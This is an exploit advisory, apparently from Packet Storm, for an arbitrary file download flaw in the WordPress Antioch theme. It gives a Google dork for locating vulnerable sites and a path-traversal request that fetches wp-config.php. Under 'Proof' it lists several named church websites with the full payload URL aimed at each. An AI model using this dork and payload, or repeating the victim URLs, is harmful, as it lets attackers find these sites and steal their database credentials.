WordPress Antioch theme suffers from an arbitrary file download vulnerability. Note that this finding houses site-specific data.
2b12727a6b9750cf997f7294938d75876289238f5c437e1c5bbe279593a9373e|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Antioch Theme Arbitrary File Download
Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/antioch
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://churchthemes.net/themes/antioch
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://gospelrevolutionchurch.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://fbch.org/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://fbch.org/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://www.stpeterssouthborough.co.uk/beta/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://kingdomfirerevival.com/main/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed